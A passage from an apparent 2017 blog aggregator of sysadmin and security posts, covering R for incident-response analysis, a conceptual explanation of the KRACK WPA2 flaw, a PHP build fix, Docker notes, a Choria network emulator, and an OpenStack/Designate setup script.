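    ./deviceQuery    # should list the Tesla/GRID device and end with "Result = PASS"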


by seanpmassey at October 18, 2017 04:04 PM

HolisticInfoSec.org

McRee added to ISSA's Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:35 AM

toolsmith #128 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would be helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from Secure360.org's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us: we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With a very few lines of R, investigators might be able to reach conclusions more quickly.
All the code described in the post can be found on my GitHub.

Have you been pwned?

I covered this scenario in an earlier post; I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principles is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to this is TraMineR: Trajectory Miner for R. This package is for mining, describing and visualizing sequences of states or events, and more generally discrete sequence data. Its primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow, though, the project page fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from the above-mentioned paper. Figure 1 shows text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.


A screen capture of the resulting sunburst also follows as Figure 4.

Figure 4


How do your potential attackers feel, or can you identify an attacker via sentiment analysis?

Do certain adversaries or adversarial communities use social media? Yes
As such, can social media serve as an early warning system, if not an actual sensor? Yes
Are certain adversaries, at times, so unaware of OpSec on social media that you can actually locate them or correlate against other geo data? Yes
Some excellent R code to assess Twitter data with includes Jeff Gentry's twitteR and rtweet to interface with the Twitter API.
  • twitteR: provides access to the Twitter API. Most functionality of the API is supported, with a bias towards API calls that are more useful in data analysis as opposed to daily interaction.
  • rtweet: R client for interacting with Twitter’s REST and stream APIs.
The code and concepts here are drawn directly from Michael Levy, PhD UC Davis: Playing With Twitter.
Here's the scenario: DDoS attacks from hacktivist or chaos groups.
Attacker groups often use associated hashtags and handles and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. As such, here's a walk-through of analysis techniques that may help identify or better understand the motives of certain adversaries and adversary groups. I don't use actual adversary handles here, for obvious reasons. I instead used a DDoS news cycle and journalist/bloggers handles as exemplars. For this example I followed the trail of the WireX botnet, comprised mainly of Android mobile devices utilized to launch a high-impact DDoS extortion campaign against multiple organizations in the travel and hospitality sector in August 2017. I started with three related hashtags: 
  1. #DDOS 
  2. #Android 
  3. #WireX
We start with all related Tweets by day and time of day. The code is succinct and efficient, as noted in Figure 5.

Figure 5
The result is a pair of graphs color coded by tweets and retweets per Figure 6.

Figure 6

This gives you an immediate feel for spikes in interest by day as well as time of day, particularly with attention to retweets.
Want to see what platforms potential adversaries might be tweeting from? No problem, code in Figure 7.
Figure 7

The result in the scenario ironically indicates that the majority of related tweets using our hashtags of interest are coming from Androids per Figure 8. :-)


Figure 8
Now to the analysis of emotional valence, or the "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation."
orig$text[which.max(orig$emotionalValence)] tells us that the most positive tweet is "A bunch of Internet tech companies had to work together to clean up #WireX #Android #DDoS #botnet."
orig$text[which.min(orig$emotionalValence)] tells us that "Dangerous #WireX #Android #DDoS #Botnet Killed by #SecurityGiants" is the most negative tweet.
Interesting right? Almost exactly the same message, but very different valence.
How do we measure emotional valence changes over the day? Four lines later...
filter(orig, mday(created) == 29) %>%
  ggplot(aes(created, emotionalValence)) +
  geom_point() + 
  geom_smooth(span = .5)
...and we have Figure 9, which tells us that most tweets about WireX were emotionally neutral on 29 AUG 2017; around 0800 we saw one positive tweet, with more negative tweets overall in the morning.

Figure 9
Another line of questioning to consider: which tweets are more often retweeted, positive or negative? As you can imagine with information security focused topics, negativity wins the day.
Three lines of R...
ggplot(orig, aes(x = emotionalValence, y = retweetCount)) +
  geom_point(position = 'jitter') +
  geom_smooth()
...and we learn just how popular negative tweets are in Figure 10.

Figure 10
There is a cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly lead to a good feel for the overall sentiment of an attacker collective, particularly one with less opsec and more desire for attention via social media.
In Part 2 of DFIR Redefined: Deeper Functionality for Investigators with R we'll explore this scenario further via sentiment analysis and Twitter data, as well as Fast Frugal Trees (decision trees) for prioritizing criticality.
Let me know if you have any questions on the first part of this series via @holisticinfosec or russ at holisticinfosec dot org.
Cheers...until next time. 

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:14 AM

OpenSSL

More China Press Coverage

Press Coverage

There have been more articles written based on the interviews with Paul Yang from BaishanCloud, Tim Hudson, and Steve Marquess from the OpenSSL team.

These join the articles noted in the previous blog entry.

October 18, 2017 01:00 AM

October 17, 2017

The Lone Sysadmin

Advice On Downgrading Adobe Flash

VMware has a KB article out (linked below) about the Adobe Flash crashes that happen if you’re running the latest version of Flash (27.0.0.170). A lot of us were caught off guard recently when our PCs updated themselves and we couldn’t get into our VMware vSphere environments. The VMware KB article suggests downgrading your Flash […]

The post Advice On Downgrading Adobe Flash appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 17, 2017 03:59 PM

October 16, 2017

ma.ttias.be

Compile PHP from source: error: utf8_mime2text() has new signature

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

It's been a while, but I had to recompile PHP from source and ran into this problem during the ./configure stage.

$ ./configure
...
checking for IMAP Kerberos support... no
checking for IMAP SSL support... yes
checking for utf8_mime2text signature... new
checking for U8T_DECOMPOSE...
configure: error: utf8_mime2text() has new signature, but U8T_CANONICAL is missing.
This should not happen. Check config.log for additional information.

To resolve that utf8_mime2text() has new signature, but U8T_CANONICAL is missing error, on CentOS you can install the libc-client-devel package.

$ yum install libc-client-devel

After that, your ./configure should go through.
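
For reference, the kind of ./configure invocation that trips this check is one that enables the imap extension, something along these lines (other flags and install paths omitted for brevity):

$ ./configure --with-imap --with-imap-ssl --with-kerberos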

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

by Mattias Geniar at October 16, 2017 08:30 PM

Cryptography Engineering

Falling through the KRACKs

The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.

The paper is here. It’s pretty easy to read, and you should.

I don’t want to spend much time talking about KRACK itself, because the vulnerability is pretty straightforward. Instead, I want to talk about why this vulnerability continues to exist so many years after WPA was standardized. And separately, to answer a question: how did this attack slip through, despite the fact that the 802.11i handshake was formally proven secure?

A quick TL;DR on KRACK

For a detailed description of the attack, see the KRACK website or the paper itself. Here I’ll just give a brief, high level description.

The 802.11i protocol (also known as WPA2) includes two separate mechanisms to ensure the confidentiality and integrity of your data. The first is a record layer that encrypts WiFi frames, to ensure that they can’t be read or tampered with. This encryption is (generally) implemented using AES in CCM mode, although there are newer implementations that use GCM mode, and older ones that use RC4-TKIP (we’ll skip these for the moment.)

The key thing to know is that AES-CCM (and GCM, and TKIP) is a stream cipher, which means it’s vulnerable to attacks that re-use the same key and “nonce”, also known as an initialization vector. 802.11i deals with this by constructing the initialization vector using a “packet number” counter, which initializes to zero after you start a session, and always increments (up to 2^48, at which point rekeying must occur). This should prevent any nonce re-use, provided that the packet number counter can never be reset.
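
If you want to convince yourself why nonce re-use is fatal for a stream cipher, here's a tiny illustration using generic AES-CTR via the openssl command line (this is not the 802.11 CCMP construction, just the underlying principle): encrypting two messages under the same key and IV yields ciphertexts that differ only where the plaintexts differ, so XORing the ciphertexts cancels the keystream entirely.

  KEY=00112233445566778899aabbccddeeff
  IV=000102030405060708090a0b0c0d0e0f      # the "nonce" -- deliberately reused here
  echo -n "attack at dawn!!" | openssl enc -aes-128-ctr -K $KEY -iv $IV | xxd -p
  echo -n "attack at dusk!!" | openssl enc -aes-128-ctr -K $KEY -iv $IV | xxd -p
  # The two hex strings match everywhere except the bytes where the plaintexts differ,
  # because both messages were XORed against the identical keystream.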

The second mechanism you should know about is the “four way handshake” between the AP and a client (supplicant) that’s responsible for deriving the key to be used for encryption. The particular message KRACK cares about is message #3, which causes the new key to be “installed” (and used) by the client.

I’m a four-way handshake. Client is on the left, AP is on the right. (courtesy Wikipedia, used under CC).

The key vulnerability in KRACK (no pun intended) is that the acknowledgement to message #3 can be blocked by adversarial nasty people.* When this happens, the AP re-transmits this message, which causes (the same) key to be reinstalled into the client (note: see update below*). This doesn’t seem so bad. But as a side effect of installing the key, the packet number counters all get reset to zero. (And on some implementations like Android 6, the key gets set to zero — but that’s another discussion.)

The implication is that by forcing the AP to replay this message, an adversary can cause a connection to reset nonces and thus cause keystream re-use in the stream cipher. With a little cleverness, this can lead to full decryption of traffic streams. And that can lead to TCP hijacking attacks. (There are also direct traffic forgery attacks on GCM and TKIP, but this as far as we go for now.)

How did this get missed for so long?

If you’re looking for someone to blame, a good place to start is the IEEE. To be clear, I’m not referring to the (talented) engineers who designed 802.11i — they did a pretty good job under the circumstances. Instead, blame IEEE as an institution.

One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck.

The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.

This whole process is dumb and — in this specific case — probably just cost industry tens of millions of dollars. It should stop.

The second problem is that the IEEE standards are poorly specified. As the KRACK paper points out, there is no formal description of the 802.11i handshake state machine. This means that implementers have to implement their code using scraps of pseudocode scattered around the standards document. It happens that this pseudocode leads to the broken implementation that enables KRACK. So that’s bad too.

And of course, the final problem is implementers. One of the truly terrible things about KRACK is that implementers of the WPA supplicant (particularly on Linux) managed to somehow make Lemon Pledge out of lemons. On Android 6 in particular, replaying message #3 actually sets an all-zero key. There’s an internal logic behind why this happens, but Oy Vey. Someone actually needs to look at this stuff.

What about the security proof?

The fascinating thing about the 802.11i handshake is that despite all of the roadblocks IEEE has thrown in people’s way, it (the handshake, at least) has been formally analyzed. At least, for some definition of the term.

(This isn’t me throwing shade — it’s a factual statement. In formal analysis, definitions really, really matter!)

A paper by He, Sundararajan, Datta, Derek and Mitchell (from 2005!) looked at the 802.11i handshake and tried to determine its security properties. What they determined is that yes, indeed, it did produce a secret and strong key, even when an attacker could tamper with and replay messages (under various assumptions). This is good, important work. The proof is hard to understand, but this is par for the course. It seems to be correct.

Representation of the 4-way handshake from the paper by He et al. Yes, I know you’re like “what?“. But that’s why people who do formal verification of protocols don’t have many friends.

Even better, there are other security proofs showing that — provided the nonces are never repeated — encryption modes like CCM and GCM are highly secure. This means that given a secure key, it should be possible to encrypt safely.

So what went wrong?

The critical problem is that while people looked closely at the two components — handshake and encryption protocol — in isolation, apparently nobody looked closely at the two components as they were connected together. I’m pretty sure there’s an entire geek meme about this.

Two unit tests, 0 integration tests, thanks Twitter.

Of course, the reason nobody looked closely at this stuff is that doing so is just plain hard. Protocols have an exponential number of possible cases to analyze, and we’re just about at the limit of the complexity of protocols that human beings can truly reason about, or that peer-reviewers can verify. The more pieces you add to the mix, the worse this problem gets.

In the end we all know that the answer is for humans to stop doing this work. We need machine-assisted verification of protocols, preferably tied to the actual source code that implements them. This would ensure that the protocol actually does what it says, and that implementers don’t further screw it up, thus invalidating the security proof.

This needs to be done urgently, but we’re so early in the process of figuring out how to do it that it’s not clear what it will take to make this stuff go live. All in all, this is an area that could use a lot more work. I hope I live to see it.

===

* Update: An early version of this post suggested that the attacker would replay the third message. This can indeed happen, and it does happen in some of the more sophisticated attacks. But primarily, the paper describes forcing the AP to resend it by blocking the acknowledgement from being received at the AP. Thanks to Nikita Borisov and Kyle Birkeland for the fix!


by Matthew Green at October 16, 2017 01:27 PM

October 14, 2017

Electricmonk.nl

Ansible-cmdb v1.23: Generate a host overview of Ansible facts.

I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
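
For anyone new to the tool, the basic workflow is roughly as follows; the output directory and host pattern here are just examples:

  # Gather facts from all hosts into ./out, then render the static HTML overview
  ansible -m setup --tree out/ all
  ansible-cmdb out/ > overview.html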

This release includes the following changes:

  • group_vars are now parsed.
  • Sub directories in host_vars are now parsed.
  • Addition of a -q/--quiet switch to suppress warnings.
  • Minor bugfixes and additions.

As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.

by admin at October 14, 2017 09:33 AM

October 11, 2017

Steve Kemp's Blog

A busy week or two

It feels like the past week or two has been very busy, and so I'm looking forward to my "holiday" next month.

I'm not really having a holiday of course, my wife is slowly returning to work, so I'll be taking a month of paternity leave, taking sole care of Oiva for the month of November. He's still a little angel, and now that he's reached 10 months old he's starting to get much more mobile - he's on the verge of walking, but not quite there yet. Mostly that means he wants you to hold his hands so that he can stand up, swaying back and forth before the inevitable collapse.

Beyond spending most of my evenings taking care of him, from the moment I return from work to his bedtime (around 7:30PM), I've made the Debian Administration website both read-only and much simpler. In the past that site was powered by a lot of servers, I think around 11. Now it has only a small number of machines, which should slowly decrease.

I've ripped out the database host, the redis host, the events-server, the planet-machine, the email-box, etc. Now we have a much simpler setup:

  • Front-end machine
    • Directly serves the code site
    • Directly serves the SSL site which exists solely for Let's Encrypt
    • Runs HAProxy to route the rest of the requests to the cluster.
  • 4 x Apache servers
    • Each one has a (read-only) MySQL database on it for the content.
      • In case of future-compromise I removed all user passwords, and scrambled the email-addresses.
      • I don't think there's a huge risk, but better safe than sorry.
    • Each one runs the web-application.
      • Which now caches each generated page to /tmp/x/x/x/x/$hash if it doesn't exist.
      • If the request is cached it is served from that cache rather than dynamically.

Finally although I'm slowly making progress with "radio stuff" I've knocked up a simple hack which uses an ultrasonic sensor to determine whether I'm sat in front of my (home) PC. If I am everything is good. If I'm absent the music is stopped and the screen locked. Kinda neat.

(Simple ESP8266 device wired to the sensor. When the state changes a message is posted to Mosquitto, where a listener reacts to the change(s).)
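
The listening side can be as small as a shell loop around mosquitto_sub; something along these lines, though the broker host, topic name and the exact pause/lock commands will differ per setup:

  # React to presence changes published by the ESP8266
  mosquitto_sub -h broker.example.org -t 'desk/presence' | while read -r state; do
    case "$state" in
      absent)  mpc pause; xscreensaver-command -lock ;;
      present) mpc play ;;
    esac
  done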

Oh, not final. I've also transferred my mobile phone from DNA.fi to MoiMobile. Which should complete soon; right now my phone is in limbo, active on neither service. Oops.

October 11, 2017 09:00 PM

October 10, 2017

Sean's IT Blog

Nutanix Xtract for VMs #blogtober

One of the defining features of the Nutanix platform is simplicity.  Innovations like the Prism interface for infrastructure management and One-Click Upgrades for both the Nutanix software-defined storage platform and supported hypervisors have lowered the management burden of on-premises infrastructure.

Nutanix is now looking to bring that same level of simplicity to migrating virtual machines to a new hypervisor.  Nutanix has released a new tool today called Xtract for VM.  This tool, which is free to all Nutanix customers, brings the same one-click simplicity that Nutanix is known for to migrating workloads from ESXi to AHV.

So how does Xtract for VM differ from other migration tools?  First, it is an agentless migration tool.  Xtract will communicate with vCenter to get a list of VMs that are in the ESXi infrastructure, and it will build a migration plan and synchronize the VM data from ESXi to AHV.

During data synchronization and migration, Xtract will insert the AHV device drivers into the virtual machine.  It will also capture and preserve the network configuration, so the VM will not lose connectivity or require administrator intervention after the migration is complete.

By injecting the AHV drivers and preserving the network configuration during the data synchronization and cutover, Xtract is able to perform cross-hypervisor migrations with minimal downtime.  And since the original VM is not touched during the migration, rollback is as easy as shutting down the AHV VM and powering the ESXi VM back on, which significantly reduces the risk of cross-hypervisor migrations.

Analysis

The datacenter is clearly changing, and we now live in a multi-hypervisor world.  While many customers will still run VMware for their on-premises environments, there are many that are looking to reduce their spend on hypervisor products.  Xtract for VMs provides a tool to help reduce that cost while providing the simplicity that Nutanix is known for.

While Xtract is currently version 1.0, I can see this technology being pivotal in helping customers move workloads between on-premises and cloud infrastructures.

To learn more about this new tool, you can check out the Xtract for VMs page on Nutanix’s webpage.


by seanpmassey at October 10, 2017 04:36 PM

October 09, 2017

Sarah Allen

getting started with docker

Learning about docker this weekend… it is always hard to find resources for people who understand the concepts of VMs and containers and need to dive into something just a little bit complicated. I had been through lots of intro tutorials when docker first arrived on the scene, and was seeking to set up a hosted dev instance for an existing open source project which already had a docker setup.

Here’s an outline of the key concepts:

  • docker-machine: commands to create and manage VMs, whether locally or on a remote server
  • docker: commands to talk to your active VM that is already set up with docker-machine
  • docker-compose: a way to create and manage multiple containers on a docker-machine

As happens, I see parallels between human spoken language and new technical terms, which makes sense since these are things made by and for humans. The folks who made Docker invented a kind of language for us to talk to their software.

I felt like I was learning to read in a new language, like pig-latin, where words have a prefix of docker, like some kind of honorific

They use docker- to speak to VMs locally or remotely, and docker (without a dash) is an intimate form of communication with your active VM
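
As a concrete example of the three layers, a minimal session might look like this (the VirtualBox driver and the machine name dev are just illustrative choices):

  docker-machine create --driver virtualbox dev   # create and manage a VM
  eval "$(docker-machine env dev)"                # point the docker client at that VM
  docker run hello-world                          # talk to the active VM
  docker-compose up -d                            # start the containers defined in a local docker-compose.yml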

Writing notes here, so I remember when I pick this up again. If there are Docker experts reading this, I’d be interested to know if I got this right and if there are other patterns or naming conventions that might help fast-track my learning of this new dialect for deploying apps in this land of containers and virtual machines.

Also, if a kind and generous soul wants to help an open source project, I’ve written up my work-in-progress steps for setting up OpenOpps-platform dev instance and would appreciate any advice, and of course, would welcome a pull request.

by sarah at October 09, 2017 02:17 PM

R.I.Pienaar

The Choria Emulator

In my previous posts I discussed what goes into load testing a Choria network, what connections are made, subscriptions are made etc.

From this it’s obvious the things we should be able to emulate are:

  • Connections to NATS
  • Subscriptions – which implies number of agents and sub collectives
  • Message payload sizes

To make it realistically affordable to emulate many more machines than I have, I made an emulator that can start numbers of Choria daemons on a single node.

I’ve been slowly rewriting MCollective daemon side in Go which means I already had all the networking and connectors available there, so a daemon was written:

usage: choria-emulator --instances=INSTANCES [<flags>]
 
Emulator for Choria Networks
 
Flags:
      --help                 Show context-sensitive help (also try --help-long and --help-man).
      --version              Show application version.
      --name=""              Instance name prefix
  -i, --instances=INSTANCES  Number of instances to start
  -a, --agents=1             Number of emulated agents to start
      --collectives=1        Number of emulated subcollectives to create
  -c, --config=CONFIG        Choria configuration file
      --tls                  Enable TLS on the NATS connections
      --verify               Enable TLS certificate verifications on the NATS connections
      --server=SERVER ...    NATS Server pool, specify multiple times (eg one:4222)
  -p, --http-port=8080       Port to listen for /debug/vars

You can see here it takes a number of instances, agents and collectives. The instances will all respond with ${name}-${instance} on any mco ping or RPC commands. They can be discovered using the normal mco discovery – though only agent and identity filters are supported.

Every instance will be a Choria daemon with the exact same network connection and NATS subscriptions as real ones. Thus 50 000 emulated Choria instances will put the exact same load on your NATS brokers as normal ones would. Performance-wise, even with high concurrency the emulator performs quite well – it’s many orders of magnitude faster than the ruby Choria client anyway, so it’s real enough.

The agents they start are all copies of this one:

emulated0
=========
 
Choria Agent emulated by choria-emulator
 
      Author: R.I.Pienaar <rip@devco.net>
     Version: 0.0.1
     License: Apache-2.0
     Timeout: 120
   Home Page: http://choria.io
 
   Requires MCollective 2.9.0 or newer
 
ACTIONS:
========
   generate
 
   generate action:
   ----------------
       Generates random data of a given size
 
       INPUT:
           size:
              Description: Amount of text to generate
                   Prompt: Size
                     Type: integer
                 Optional: true
            Default Value: 20
 
 
       OUTPUT:
           message:
              Description: Generated Message
               Display As: Message

You can see this has a basic data generator action – you give it a desired size and it makes you a message of that size. It will run as many of these as you wish, all named emulated0 and so on.
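
Interacting with the emulated agents is then plain mco; for example, asking one emulated instance for 512 bytes of generated data might look roughly like this (the identity is whatever ${name}-${instance} works out to in your run):

$ mco rpc emulated0 generate size=512 -I example-0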

It has an mcollective agent that goes with it; the idea is you create a pool of machines all with your normal mcollective on them and this agent. Using that agent you then build up a different, new mcollective network comprising the emulators, federation and NATS.

Here’s some example of commands – you’ll see these later again when we talk about scenarios:

We download the dependencies onto all our nodes:

$ mco playbook run setup-prereqs.yaml --emulator_url=https://example.net/rip/choria-emulator-0.0.1 --gnatsd_url=https://example.net/rip/gnatsd --choria_url=https://example.net/rip/choria

We start NATS on our first node:

$ mco playbook run start-nats.yaml --monitor 8300 --port 4300 -I test1.example.net

We start the emulator with 1500 instances per node all pointing to our above NATS:

$ mco playbook run start-emulator.yaml --agents 10 --collectives 10 --instances 750 --monitor 8080 --servers 192.168.1.1:4300

You’ll then set up a client config for the built network and can interact with it using normal mco stuff and the test suite I’ll show later. Similarly there are playbooks to stop all the various parts etc. The playbooks just interact with the mcollective agent so you could use mco rpc directly too.

I found I can easily run 700 to 1000 instances on basic VMs – needs like 1.5GB RAM – so it’s fairly light. Using 400 nodes I managed to build a 300 000 node Choria network and could easily interact with it etc.

Finally I made an EC2 environment where you can stand up a Puppet Master, Choria, the emulator and everything you need and do load tests on your own dime. I was able to do many runs with 50 000 emulated nodes on EC2 and the whole lot cost me less than $20.

The code for this emulator is very much a work in progress as is the Go code for the Choria protocol and networking but the emulator is here if you want to take a peek.

by R.I. Pienaar at October 09, 2017 07:37 AM

Joe Topjian

Building OpenStack Environments Part 3

Introduction

Continuing on with the series of building disposable OpenStack environments for testing purposes, this part will cover how to install services which are not supported by PackStack.

While PackStack does an amazing job at easily and quickly creating OpenStack environments, it only has the ability to install a subset of services under the OpenStack umbrella. However, almost all OpenStack services are supported by RDO, the overarching package library for RedHat/CentOS.

For this part in the series, I will show how to install and configure Designate, the OpenStack DNS service, using the RDO packages.

Planning the Installation

PackStack spoils us by hiding all of the steps required to install an OpenStack service. Installing a service requires a good amount of planning, even if the service is only going to be used for testing rather than production.

To begin planning, first read over any documentation you can find about the service in question. For Designate, there is a good amount of documentation here.

The overview page shows that there are a lot of moving pieces to Designate. Whether or not you need to account for all of these is still in question since it's possible that the RDO packages provide some sort of base configuration.

The installation page gives some brief steps about how to install Designate. By reading the page, you can see that all of the services listed in the Overview do not require special configuration. This makes things more simple.

Keep in mind that if you were to deploy Designate for production use, you might have to tune all of these services to suit your environment. Determining how to tune these services is out of scope for this blog post. Usually it requires careful reading of the various Designate configuration files, looking for supplementary information on mailing lists, and often even reading the source code itself.

The installation page shows how to use BIND as the default DNS driver. However, I'm going to change things up here. Instead, I will show how to use PowerDNS. There are two reasons for this:

  1. I'm allergic to BIND.
  2. I had trouble piecing together everything required to run Designate with the new PowerDNS driver, so this will also serve as documentation to help others.

Adding the Installation Steps

Continuing with Part 1 and Part 2, you should have a directory called terraform-openstack-test on your workstation. The structure of the directory should look something like this:

$ pwd
/home/jtopjian/terraform-openstack-test
$ tree .
.
├── files
│   └── deploy.sh
├── key
│   ├── id_rsa
│   └── id_rsa.pub
├── main.tf
└── packer
    ├── files
    │   ├── deploy.sh
    │   ├── packstack-answers.txt
    │   └── rc.local
    └── openstack
        ├── build.json
        └── main.tf

deploy.sh is used to install and configure PackStack and then strip any unique information from the installation. Packer then makes an image out of this installation. Finally, rc.local does some post-boot configuration.

To install and configure Designate, you will want to add additional pieces to both deploy.sh and rc.local.

Installing PowerDNS

First, install and configure PowerDNS. To do this, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

+ mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
+ mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y epel-release yum-plugin-priorities
+ curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
+ yum install -y pdns pdns-backend-mysql
+
+ echo "daemon=no
+ allow-recursion=127.0.0.1
+ config-dir=/etc/powerdns
+ daemon=yes
+ disable-axfr=no
+ guardian=yes
+ local-address=0.0.0.0
+ local-ipv6=::
+ local-port=53
+ setgid=pdns
